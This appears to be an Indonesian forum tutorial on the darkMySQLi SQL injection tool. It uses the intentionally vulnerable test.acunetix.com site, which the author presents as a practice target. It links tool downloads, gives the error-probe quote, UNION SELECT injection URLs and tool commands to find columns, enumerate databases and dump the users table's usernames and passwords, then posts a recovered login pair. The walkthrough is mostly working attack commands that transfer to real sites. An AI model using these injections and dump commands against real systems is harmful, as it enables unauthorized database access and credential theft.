sql injection with dark my SQLI

scrypt nya bisa di Download disini :
http://rapidshare.com/files/211594510/darkmysqli16.rar
http://www.darkc0de.com/others/darkmysqli16.zip
http://tinyurl.com/darkMySQLi

klo masih vailit loh..

Ini cuma buat latihan yang mau nyobain darkmysqli16!
di

http://test.acunetix.com

Untuk tutorialnya hampir mirip dengan schemafuzz.py

langsung ke TKP
http://test.acunetix.com/

Cari yang vuln... kebetulan saya nyoba yang
http://test.acunetix.com/artists.php?artist=1
jangan lupa tambah single quote ('), untuk mengetahui ERROR nya..


To the point langsung menggunakan darkmysqli16.py

Cari column
dengan perintah

--findcol
exp:
Code:
darkmysqli16.py -u "http://test.acunetix.com/artists.php?artist=1" --findcol


jadi kaya gini




kemudian, setelah dapet injekkannya
Code:
darkMySQLi URL: http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de--


karena udah tau ada 3 column jadi di buat singkat menjadi
Code:
"http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1.darkc0de,3--"


Masukin dech perintah

--full

exp:
darkmysqli16.py -u "http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3--" --full

untuk enumerasi nya
hasilnya kaya gini



setelah dah dapet...

Database dan columnya semua...
masukin

--dump -D (Nama database-nya) -T (nama table-nya) -C (nama file / kolom-nya)

Exp:

darkmysqli16.py -u "http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3--" --dump -D acuart -T users -C uname,pass


Hasilnya kaya gini



ada yang terencrypt dan ada yang ngga

saya masukin yang ga terencrypt

http://test.acunetix.com/login.php
gopala : gopala

kembangkan iia

thx... hihihihi